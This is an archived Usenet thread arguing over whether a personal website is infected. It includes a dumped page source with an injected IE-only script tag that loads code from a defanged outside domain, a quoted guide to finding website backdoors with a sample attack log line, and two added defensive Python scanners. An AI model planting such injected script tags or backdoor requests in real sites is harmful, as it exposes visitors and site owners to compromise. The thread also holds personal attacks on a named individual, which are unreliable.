A Windows XP help forum. PCbanter


(OT) What happened to Pooh?



 
 
  #61  
Old June 2nd 17, 12:23 AM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Shadow
external usenet poster
 
Posts: 1,638
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On Thu, 1 Jun 2017 09:46:21 +0100, "David B."
wrote:

On 31/05/2017 18:49, Shadow wrote:
On Wed, 31 May 2017 15:23:09 +0100, "David B."
wrote:

On 31/05/2017 14:50, (PeteCresswell) wrote:
Per David B.:
I perceive that you have absolutely no idea that your Windows XP machine
has *ALREADY* been compromised and co-opted into a huge Botnet.

But wouldn't an AV app like Avast pick up on that?

Sadly, not necessarily.

That's MY understanding anyway.


Are you speaking as a "security expert"


I'm no expert, but I am more careful than you appear to be! ;-)

http://tekrider.net/pages/david-brooks-stalker.php


Not a good link to follow, Shadow!

Perhaps this screenshot will help you understand *HOW* your computer
became infected:-


It did, thank you, show me why I was NOT infected, but you
were.. As you know, the site you posted the "screenshot" (which I
didn't try to download - if it was important, you would have posted in
words, not as an image) was hacked.
All those 404's you are getting ..... explained.
Pr0N sites are safer.
[]'s

--
Don't be evil - Google 2004
We have a new policy - Google 2012
  #62  
Old June 2nd 17, 12:25 AM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Shadow
external usenet poster
 
Posts: 1,638
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On Thu, 1 Jun 2017 11:40:33 +0100, "David B."
wrote:

http://tekrider.net/pages/david-brooks-stalker.php

Not a good link to follow, Shadow!


Sure it is. It accurately describes you. Probably why you'd prefer
others not click on it. Especially since you failed to get it taken
down and as a result, decided to attack the administrator, instead.


*It's a BAD web site*! Here's the proof:


No, a link is not proof of anything. What malware does the
above site host ?
[]'s
--
Don't be evil - Google 2004
We have a new policy - Google 2012
  #63  
Old June 2nd 17, 01:05 AM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Diesel
external usenet poster
 
Posts: 937
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

"David B." Thu, 01 Jun 2017 10:40:33 GMT in alt.2600, wrote:

*It's a BAD web site*! Here's the proof:-

https://sitecheck.sucuri.net/results/www.tekrider.net


Already examined your proof and posted my analysis results. Nothing
bad about the website, but, if it helps, you exposed the sometimes
glaring incompetence of sucuri. I've done further analysis since my
original post. See below.

Securi says YOU are wrong, Dustin!


It's Sucuri. They are using scaremongering tactics with you. As
well as contradicting themselves. A suspicious url (which I can't
find in my local copy of tekrider or the online version when checked
with firefox or wget) isn't malware by itself. A url alone can't
actually be malware. What it points to, oth, could be. But, in this
particular case, the code they claim is present, isn't.

So, contrary to what you may think, they aren't saying I'm wrong,
either. Suspicious does not equal malware. And, they consider the
missing html source (I can't find it in my local copy or the online
edition) suspicious ONLY because a piece of its domain, or, the
entire thing (I'm not sure which; didn't check; not sure if they
publish their blacklist) is supposedly blacklisted by them. That
doesn't automatically make it malware, either.

wget tekrider.net
--2017-06-01 19:41:47-- http://tekrider.net/
Resolving tekrider.net... 192.251.238.3
Connecting to tekrider.net|192.251.238.3|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: pages/index.php [following]
--2017-06-01 19:41:47-- http://tekrider.net/pages/index.php
Reusing existing connection to tekrider.net:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `index.php'

[ = ] 5,737 --.-K/s in 0.02s

2017-06-01 19:41:47 (227 KB/s) - `index.php' saved [5737]

Verified the lines Sucuri thinks are present in the index.php using
alleycode and notepad (not necessary, but, I like to be thorough for
you) are not.

Also verified the results with firefox:

view-source:https://tekrider.net/pages/index.php

So, that's three separate ways of doing it, and, all three confirm,
Sucuri is incorrect. Local mirrored copy (#1), wget (#2), firefox
(#3) as I know you're a bit 'slow' concerning matters of a
technical nature.

Btw, the local image was done on the 29th of May.

So much for them saying I'm wrong, David... ROFL!

I'll let you know what you owe me for doing this for you, soon.

They know their stuff, I'm sure! :-)


Did you visit the following url, David?

https://www.whitefirdesign.com/blog/...heir-services/




--
Nope, I can't go to hell.
Satan still has a restraining order against me.
https://tekrider.net/pages/david-brooks-stalker.php
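
Added example (not part of any post in this thread): one way to make the comparison described in the post above repeatable is to extract every script source from each saved copy of a page, including scripts inside IE conditional comments, and list the external hosts that show up in some copies but not in all of them. The HTML samples, copy labels and host names below are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

    def handle_comment(self, data):
        # <!--[if IE]> ... <![endif]--> reaches the parser as one comment,
        # so markup inside it is invisible unless the body is parsed again.
        if data.lstrip().lower().startswith("[if"):
            inner = ScriptCollector()
            inner.feed(data)
            inner.close()
            self.sources.extend(inner.sources)


def external_script_hosts(html, page_host):
    """Return the set of hosts, other than page_host, that scripts load from."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    hosts = set()
    for src in collector.sources:
        host = urlsplit(src).hostname  # None for relative paths
        if host and host != page_host:
            hosts.add(host)
    return hosts


def compare_copies(copies, page_host):
    """Map each external script host that is NOT present in every copy
    to the sorted labels of the copies that contain it."""
    seen = {}
    for label, html in copies.items():
        for host in external_script_hosts(html, page_host):
            seen.setdefault(host, []).append(label)
    return {h: sorted(ls) for h, ls in seen.items() if len(ls) < len(copies)}


# Constructed sample page: one relative script and one shared external script.
PAGE = """<html><head>
<script type="text/javascript" src="../system/menu.js"></script>
<script type="text/javascript" src="https://cdn.example.net/lib.js"></script>
</head><body><p>Welcome</p>{extra}</body></html>"""

# Constructed extra markup that only one of the copies contains.
INJECTED = ('<!--[if IE]><script type="text/javascript" '
            'src="http://injected.example.invalid/alert/"></script><![endif]-->')

# Constructed copies of the same URL taken from three vantage points.
SAMPLE_COPIES = {
    "local-mirror": PAGE.format(extra=""),
    "wget": PAGE.format(extra=""),
    "scanner": PAGE.format(extra=INJECTED),
}

if __name__ == "__main__":
    for host, labels in compare_copies(SAMPLE_COPIES, "site.example").items():
        print(f"{host}: only in {', '.join(labels)}")
```

A host that appears in only some copies shows that the vantage points received different markup; it does not by itself say whether the server, the client or something in between produced the difference.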
  #65  
Old June 2nd 17, 10:33 AM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Anonymous
external usenet poster
 
Posts: 370
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 01/06/17 23:16, Beauregard T. Shagnasty wrote:
David B. wrote:

On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....
You've added those extra lines.


*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does!


Then those "tools" (of which you know nothing) are the malware and
inserted it on their own. The code does NOT exist on my page.


The problem I have with believing you is that your site looks somewhat
different dependent on whether I connect to it directly or use a VPN.

Can you explain that, 'bts'?

May I also refer you to this post?

Message-ID:

--
..

  #66  
Old June 2nd 17, 10:57 AM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 01/06/2017 20:16, Sycho wrote:

I thought I overheard FrozenNorth say this
in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 :

On 2017-06-01 2:22 PM, David B. wrote:
On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....

You've added those extra lines.

*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does! ;-)

I just checked, the site is clean, it appears that BD has the malware.


lol The shameless **** is at it again with his cyber stalking. And
like always, he gets slapped down like the bad doggie he is.


As I'm sure you are aware, there are a number of ports open on the
Tekrider web site.

I wouldn't be at all surprised to learn that YOU are responsible for the
offending script being added to the site as I have described.

You can see it clearly here - line 86:-


Header returned by request for: http://tekrider.net/ - 192.251.238.3

HTTP/1.1 302 Moved Temporarily
Date: Wed, 31 May 2017 13:56:17 GMT
Server: Apache
X-Powered-By: PHP/5.6.23
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

The location line in the header above has redirected the request to:
pages/index.php

( If this redirect is not what you expected SEE: Redirects. for some
tips on clearing redirects.)


HTTP/1.1 200 OK
Date: Wed, 31 May 2017 13:56:17 GMT
Server: Apache
X-Powered-By: PHP/5.6.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT ---------------- 1981?!!*
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: tekrider=3db2bc9e1ef897e2c4b4fc9a072f901d; path=/
Last-Modified: Tue, 24 Nov 2015 13:21:45 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

Content that was returned by your request for the URL: http://tekrider.net/
Note: Content displayed is from the redirect location, the URL
pages/index.php

1: !DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
2: "http://www.w3.org/TR/html4/strict.dtd"
3: html lang="en-US"
4: head
5: title tekrider.net - Welcome to Tekrider.net /title
6: meta http-equiv="content-style-type" content="text/css"
7: meta http-equiv="language" content="english"
8: meta http-equiv="dialect" content="us"
9: meta http-equiv="window-target" content="_top"
10: meta name="author" content="Createk Software"
11: meta name="description" content="tekrider.net"
12: meta name="keywords" content="tekrider.net"
13: meta name="robots" content="all"
14: meta http-equiv="content-type" content="text/html; charset=UTF-8"
15: meta http-equiv="content-style-type" content="text/css"
16: link type="text/css" rel="stylesheet"
href="../style/tekrider.css" media="screen"
17: link type="text/css" rel="stylesheet"
href="../style/tekprint.css" media="print"
18: link rel="shortcut icon" href="../system/favicon.ico"
type="image/vnd.microsoft.icon"
19: link rel="icon" href="../system/favicon.ico"
type="image/vnd.microsoft.icon"
20: !-- if you don't see the favicon, your browser is at fault --
21: sc​ript type="text/javascript"
22: if (top.location != location)
23: // Sorry, not in YOUR frame
24: top.location.href = document.location.href ;
25: / sc​ript
26: style type='text/css'
27: #counter { width: 95%; margin-top: 2em; }
28: .cnt span {
29: background-color: #000;
30: border-top: 2px outset #d0d0d0;
31: border-left: 2px outset #d0d0d0;
32: border-right: 2px outset #a9a9a9;
33: border-bottom: 2px outset #a9a9a9;
34: color: #32cd32;
35: font-size:175%;
36: letter-spacing: 0.20em;
37: margin: 0 -0.2em 0 0;
38: padding: 0 0.2em 0 0.5em;
39: width: 1.1em;
40: }
41: .brooks {color: red; font-size: 3em;}
42: .boater { border-style: dotted; padding: .25em;}
43: /style
44: /head
45: body
47: div id='boxbanner' a id='top' /a tekrider.net /div
48: div class='ahem'
49: You may go directly to a title='Navigate' href='#themenu' the
navigation menu /a after the content.
50: /div
51: div id='boxcontent'
52: h1 http://tekrider.net/ /h1
53: p 15 April, 2008: Welcome to the home of strong Beauregard T.
Shagnasty's Playpen. /strong
54: /p
55: p class='boater' style='font-size:115%;' Note that strong
class='cveryhot' Internet Stalker DAVID BROOKS /strong of Devon, UK
56: now has his own personal web page: br
57: a href='david-brooks-stalker.php'
http://tekrider.net/pages/david-brooks-stalker.php /a /p p Why
strong tekrider /strong ? Well, it was available, while techrider
58: was not; that domain seems to belong to a young man in Oslo, though
there is only a
59: parking page at this writing. Oh, and my spouse says "Tek" is
modern Nerdic geek-speak. img class='noborder'
src='../system/smiley.gif' alt='' height='16' width='16' Note also that
60: ​t​e​k​r​i​d​e​r​. strong em c​o​m /em /strong
61: belongs to a fellow in Ontario, Canada who sells snowmobile
clothing. No relation...
62: /p
63: p I have been a motorcycle rider for about 56 years, and a
technical guy for all
64: of my employed life, but I am now retired. I have ridden somewhere
a bit over a
65: half-million miles on two wheels. /p
66: p We all see a lot of web pages with visitor or hit counters on
them. So why should I
67: skip that normally-useless bit of fluff? Therefo /p
69: div id='counter'
70: span class='imgright' img src='../system/webmaster.jpg'
alt='Beau' title='Beau' height='105' width='160'
71: br Beauregard T. Shagnasty /span p strong You are
visitor number /strong /p
72: p class='cnt' span 4,861,472 /span /p
73: p strong since yesterday. /strong /p
74: /div
75: div class='clearme' /div
76: div
77: p Other web sites written and maintained by this author: /p
78: ul
79: li a href=' http://fingerlakesbmw.org/'
http://www.fingerlakesbmw.org img class='noborder'
src='../system/offsite.png' alt='↗' title='External Site: Right-Click
and Open in New Tab/Window' height='10' width='10' /a : Finger Lakes
BMW Club /li
80: li a href=' http://freezeblock.com/'
http://www.freezeblock.com img class='noborder'
src='../system/offsite.png' alt='↗' title='External Site: Right-Click
and Open in New Tab/Window' height='10' width='10' /a : Freezeblock
Ice Dam Solutions /li
81: li class='txttiny' There are a couple of others, but the clients
choose not to be listed here. /li
82: /ul
83: /div
84: p class='pcenter' img class='noborder'
src='../system/bluefish.png' title='Made with Bluefish' alt='Bluefish
Editor' height='57' width='103' /p
85: !-- [if IE]
86: sc​ript type="text/javascript"
src=hxxp://windows-web-browsers.co.cc/alert/"
87: / sc​ript
88: !-- [endif]--
89: div IE sc​ript here /div
92: /div
94: div class="ahem"
95: hr
96: /div
97: div id="boxnav" !-- Begin menu --
98: ul
99: li img src='../system/mhome.gif' alt='' a
href='../pages/index.php' Home /a /li
100: li img src='../system/mopen.gif' alt='' a
href='../html/index.php' HTML /a /li
101: li img src='../system/mopen.gif' alt='' a
href='../pages/faq.php' FAQ /a /li
102: li img src='../system/mopen.gif' alt='' a
href='../general/index.php' General /a /li
103: li img src='../system/mopen.gif' alt='' a
href='../pages/about.php' About /a /li
104: li img src='../system/mopen.gif' alt='' a
href='../pages/tkncontact.php' Contact Me /a /li
105: /ul
106: div class="pcenter" img class="imgpad"
src="../system/roundel.gif" title="BMW Roundel" alt="BMW Roundel"
width="38" height="38"
107: /div
108: /div !-- End menu --
110: div id="boxfooter"
111: span class='imgleft'
112: img class='noborder noprint' src='../system/ubuntufooter100.png'
alt='Ubuntu Logo' title='Ubuntu Logo' height='100' width='100'
113: /span
114: div class='ahem' br br hr /div
115: p Copyright © 1997-2017 Tekrider.net. All rights reserved. br
116: span class='noprint' a class='flink' title='Use the handy
form' href='../pages/tkncontact.php' Contact me /a if you have a
comment about anything. br
117: It's Wednesday the 31st of May at 9:56 in my neighborhood. br
118: /span /p
119: /div
120: /body
121: /html

=

HTH :-)

--
"The important thing is not to stop questioning."
- Albert Einstein

  #67  
Old June 2nd 17, 02:14 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Shadow
external usenet poster
 
Posts: 1,638
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On Fri, 2 Jun 2017 10:57:06 +0100, "David B."
wrote:

On 01/06/2017 20:16, Sycho wrote:

I thought I overheard FrozenNorth say this
in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 :

On 2017-06-01 2:22 PM, David B. wrote:
On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....

You've added those extra lines.

*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does! ;-)

I just checked, the site is clean, it appears that BD has the malware.


lol The shameless **** is at it again with his cyber stalking. And
like always, he gets slapped down like the bad doggie he is.


As I'm sure you are aware, there are a number of ports open on the
Tekrider web site.


http://tekrider.net/pages/david-brooks-stalker.php


There are a "number of ports open" on ALL websites, moron.
They wouldn't be websites otherwise.
[]'s
--
Don't be evil - Google 2004
We have a new policy - Google 2012
  #68  
Old June 2nd 17, 03:03 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Beauregard T. Shagnasty[_2_]
external usenet poster
 
Posts: 137
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

David Brooks STALKER, posting as "Anonymous" wrote:

On 01/06/17 23:16, Beauregard T. Shagnasty wrote:
David B. wrote:
On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....
You've added those extra lines.

*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does!


Then those "tools" (of which you know nothing) are the malware and
inserted it on their own. The code does NOT exist on my page.


The problem I have with believing you is that your site looks somewhat
different dependent on whether I connect to it directly or use a VPN.

Can you explain that, 'bts'?


Of course I can. It's because you are a STALKER. And you *are* a STALKER,
having accessed the important pages on my web site more than *135* times
in the last few days.

--
-bts
  #69  
Old June 2nd 17, 03:08 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 02/06/2017 14:14, Shadow wrote:
On Fri, 2 Jun 2017 10:57:06 +0100, "David B."
wrote:

On 01/06/2017 20:16, Sycho wrote:

I thought I overheard FrozenNorth say this
in alt.2600 on Thu, 1 Jun 2017 14:37:50 -0400 :

On 2017-06-01 2:22 PM, David B. wrote:
On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....

You've added those extra lines.

*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does! ;-)

I just checked, the site is clean, it appears that BD has the malware.

lol The shameless **** is at it again with his cyber stalking. And
like always, he gets slapped down like the bad doggie he is.


As I'm sure you are aware, there are a number of ports open on the
Tekrider web site.


http://tekrider.net/pages/david-brooks-stalker.php


There are a "number of ports open" on ALL websites, moron.
They wouldn't be websites otherwise.
[]'s


Oops!

I did, of course, mean that there are open ports on the SERVER used by
'bts'. One can check that with NMAP. :-)

--
The only people who make a difference are the people who believe they can.
  #70  
Old June 2nd 17, 03:20 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 02/06/2017 01:05, Diesel wrote:
Did you visit the following url, David?

https://www.whitefirdesign.com/blog/...heir-services/


Yes, I did.

Most interesting, Dustin. Thank you. :-)

I reviewed the web site for a while ..... but couldn't find the page
which you provided. :-(

https://www.whitefirdesign.com/blog/page/3/?s=Securi

--
David B.
  #71  
Old June 2nd 17, 05:49 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 02/06/2017 15:03, Beauregard T. Shagnasty, a GOAT LOVER, said...

On 01/06/17 23:16, Beauregard T. Shagnasty wrote:
David B. wrote:
On 01/06/2017 19:11, Beauregard T. Shagnasty claimed ....
You've added those extra lines.

*I* most certainly have *NOT* added any extra lines!

THAT is what MALWARE does!

Then those "tools" (of which you know nothing) are the malware and
inserted it on their own. The code does NOT exist on my page.


The problem I have with believing you is that your site looks somewhat
different dependent on whether I connect to it directly or use a VPN.

Can you explain that, 'bts'?


Of course I can. It's because you are a STALKER. And you *are* a STALKER,
having accessed the important pages on my web site more than *135* times
in the last few days.


In reality, I have been INVESTIGATING - particularly folk who have
malware on their web sites - like *YOU* have!

I'm so pleased that, at last, you have been looking through your server
logs! :-) I hope it didn't take up too much time.

=

*Finding a website backdoor*.

Frequently if a hacker gets access to your website they will install a
"backdoor" designed to allow them to hack your site again even after
you've cleaned up the site, repaired the vulnerability that allowed them
to hack the site, changed passwords, updated CMS/themes/plugins,
installed security plugins, etc. Until it is found and removed a
"backdoor" is going to provide the hacker with access to your site.

Typically a backdoor script is going to be called from a browser like
any other web page, although on occasion I have seen them run from a
cron. The script gives the hacker a web page interface where they can
download and upload files, view or modify files, create directories,
change file/folder permissions, basically it allows them to manage the
site using PHP's ability to read and write files and pass operating
system commands through to the operating system.

Backdoors can be difficult to find because they are usually hidden in
files that are already part of the site or uploaded as new files with
innocent looking names, often in a directory with many files in it.
Backdoors can range from a single line of code to lengthy files that
provide the hacker the equivalent of a Control Panel on your site. There
are some examples of common backdoors at Examples of website "backdoors".

Start by checking your access logs

One way to find these scripts is by searching website access logs for
suspicious log entries generated when the hacker uses the scripts to
modify site files.

Here is a good example, from an Apache HTTP log, of a backdoor script in
actual use by a hacker, to edit the /public_html/.htaccess file:
xxx.xxx.xxx.xxx - - [dd/mm/yyyy:hh:mm:ss -0700] "GET
/path/footer.inc.php?act=edit&file=/home​/account/public_html/.htaccess
HTTP/1.1" 200 4795 "http://website/path/footer.inc.php?act=filemanager"
"Mozilla/5.0..."

footer.inc.php is the innocently-named file containing the backdoor script.

Note: the "act"(action)=edit and file=.htaccess. The backdoor has a
built-in file editor. The referrer (previous page visited) was the same
backdoor, which also has a built-in file manager. Nobody should be able
to edit your .htaccess file from a web page! A log line like this is a
huge warning flag, and points directly to the file where the backdoor
script is hidden.

The above example suggests a few obvious things to search for in your
log file:

htaccess -- Unless you write articles about .htaccess and the word is in
your search-engine-friendly file-name URLs, there is no reason for the
word htaccess to appear in your HTTP access logs.

act=edit, action=edit -- From the example above, and a reasonable variation.

filemanager -- Another word that probably won't normally appear in your
log file. If you use legitimate web-interface editors like CKEditor or
TinyMCE, they might conceivably produce log lines like this when you
edit files yourself, but the pages being called as seen in your log file
should be recognizable as scripts belonging to those editors, not weird
names like footer.inc.php.

Suspicious GET and/or POST variables -- Parameter names that you do not
use on your site and parameters that contain long strings of seemingly
random characters.

=

Ref: https://aw-snap.info/articles/find-backdoor.php

=

My boater friend said I should send you something appropriate as a
reward. How about this?

https://www.youtube.com/watch?v=miHbhcklHTk

Do you like it?

--
The only people who make a difference are the people who believe they can.
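
Added example (not part of the post above or of the article it quotes): the log searches that the quoted article lists, run over Apache combined-format lines. It checks the request and the referrer for "htaccess" and "filemanager", for act=edit or action=edit, and for long random-looking parameter values. The sample log lines, addresses and file paths are constructed, and the length and entropy thresholds are assumptions to tune per site.

```python
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

KEYWORDS = ("htaccess", "filemanager")
EDIT_PARAMS = {("act", "edit"), ("action", "edit")}

# Constructed sample lines (documentation address ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.10 - - [02/Jun/2017:10:15:30 -0700] "GET /pages/index.php HTTP/1.1" '
    '200 5737 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Jun/2017:10:16:02 -0700] "GET /path/footer.inc.php'
    '?act=edit&file=/home/account/public_html/.htaccess HTTP/1.1" 200 4795 '
    '"http://website.example/path/footer.inc.php?act=filemanager" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Jun/2017:10:17:44 -0700] "POST /images/thumb.php'
    '?k=Zx9Qp2LmV7tRb4Yc8NwK1sHd6JfG3uAe HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.22 - - [02/Jun/2017:10:18:05 -0700] "GET /pages/faq.php?q=motorcycle '
    'HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [02/Jun/2017:10:19:51 -0700] "POST /uploads/cache.php'
    '?action=edit HTTP/1.1" 200 1840 "-" "Mozilla/5.0"',
]


def shannon_entropy(s):
    """Bits of entropy per character of s (s must be non-empty)."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(value, min_len=24, min_entropy=4.0):
    """Heuristic for 'long strings of seemingly random characters'."""
    return len(value) >= min_len and shannon_entropy(value) >= min_entropy


def reasons_for(target, referer):
    """Return the list of reasons a request/referrer pair looks suspicious."""
    reasons = []
    for label, url in (("request", target), ("referer", referer)):
        lowered = url.lower()
        for kw in KEYWORDS:
            if kw in lowered:
                reasons.append(f"{label} contains '{kw}'")
        for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            if (name.lower(), value.lower()) in EDIT_PARAMS:
                reasons.append(f"{label} has {name}={value}")
            elif looks_random(value):
                reasons.append(f"{label} parameter '{name}' looks random")
    return reasons


def scan(lines):
    """Return (line number, script path, reasons) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        reasons = reasons_for(m["target"], m["referer"])
        if reasons:
            findings.append((lineno, urlsplit(m["target"]).path, reasons))
    return findings


if __name__ == "__main__":
    for lineno, script, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: {script}: {'; '.join(reasons)}")
```

The script path in each finding is the file to inspect first, since the article's point is that such a log line leads directly to where the backdoor is hidden.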
  #72  
Old June 2nd 17, 07:06 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
Beauregard T. Shagnasty[_2_]
external usenet poster
 
Posts: 137
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

David B. STALKER wrote:

On 02/06/2017 15:03, Beauregard T. Shagnasty said...
Of course I can. It's because you are a STALKER. And you *are* a
STALKER,
having accessed the important pages on my web site more than *135*
times in the last few days.


In reality, I have been INVESTIGATING -


No, you have been STALKING.

particularly folk who have
malware on their web sites - like *YOU* have!


There is NO malware on my web site. I know this for a fact and you do not.

I'm so pleased that, at last, you have been looking through your server
logs! :-) I hope it didn't take up too much time.


No time was spent with my server logs. There are other ways...

--
-bts
  #73  
Old June 2nd 17, 07:22 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
FrozenNorth[_3_]
external usenet poster
 
Posts: 42
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 2017-06-02 2:06 PM, Beauregard T. Shagnasty wrote:
David B. STALKER wrote:

On 02/06/2017 15:03, Beauregard T. Shagnasty said...
Of course I can. It's because you are a STALKER. And you *are* a
STALKER,
having accessed the important pages on my web site more than *135*
times in the last few days.


In reality, I have been INVESTIGATING -


No, you have been STALKING.

particularly folk who have
malware on their web sites - like *YOU* have!


There is NO malware on my web site. I know this for a fact and you do not.

I'm so pleased that, at last, you have been looking through your server
logs! :-) I hope it didn't take up too much time.


No time was spent with my server logs. There are other ways...

The only logs BD knows about are the things that come out of his fat
drunken ass every morning.

--
Froz....
  #74  
Old June 2nd 17, 10:29 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 02/06/2017 19:22, FrozenNorth wrote:
On 2017-06-02 2:06 PM, Beauregard T. Shagnasty wrote:
David B. STALKER wrote:

On 02/06/2017 15:03, Beauregard T. Shagnasty said...
Of course I can. It's because you are a STALKER. And you *are* a
STALKER,
having accessed the important pages on my web site more than *135*
times in the last few days.

In reality, I have been INVESTIGATING -


No, you have been STALKING.

particularly folk who have
malware on their web sites - like *YOU* have!


There is NO malware on my web site. I know this for a fact and you do
not.

I'm so pleased that, at last, you have been looking through your server
logs! :-) I hope it didn't take up too much time.


No time was spent with my server logs. There are other ways...

The only logs BD knows about are the things that come out of his fat
drunken ass every morning.


You are so very rude, ******!

https://sitecheck.sucuri.net/results/tekrider.net

MALWARE RIDDEN SITE!
  #75  
Old June 2nd 17, 10:47 PM posted to alt.comp.freeware,alt.windows7.general,alt.2600,alt.computer.workshop,alt.uk.law
David B.[_5_]
external usenet poster
 
Posts: 545
Default (OT) Oh dear! You really should *NOT* still be using Windows XP

On 02/06/2017 19:06, Beauregard T. Shagnasty wrote:
David B. STALKER wrote:

On 02/06/2017 15:03, Beauregard T. Shagnasty said...
Of course I can. It's because you are a STALKER. And you *are* a
STALKER,
having accessed the important pages on my web site more than *135*
times in the last few days.


In reality, I have been INVESTIGATING -


No, you have been STALKING.


You make it sound as if my investigations have been unsavory.

They are not! :-)

particularly folk who have
malware on their web sites - like *YOU* have!


There is NO malware on my web site. I know this for a fact and you do not.


Your site is booby-trapped!

I'm so pleased that, at last, you have been looking through your server
logs! :-) I hope it didn't take up too much time.


No time was spent with my server logs. There are other ways...


My boater friend said I should send you something appropriate as a
reward. How about this?

https://www.youtube.com/watch?v=miHbhcklHTk

*Do you like it*?

--
"Do something wonderful, people may imitate it." (Albert Schweitzer)

 




All times are GMT +1.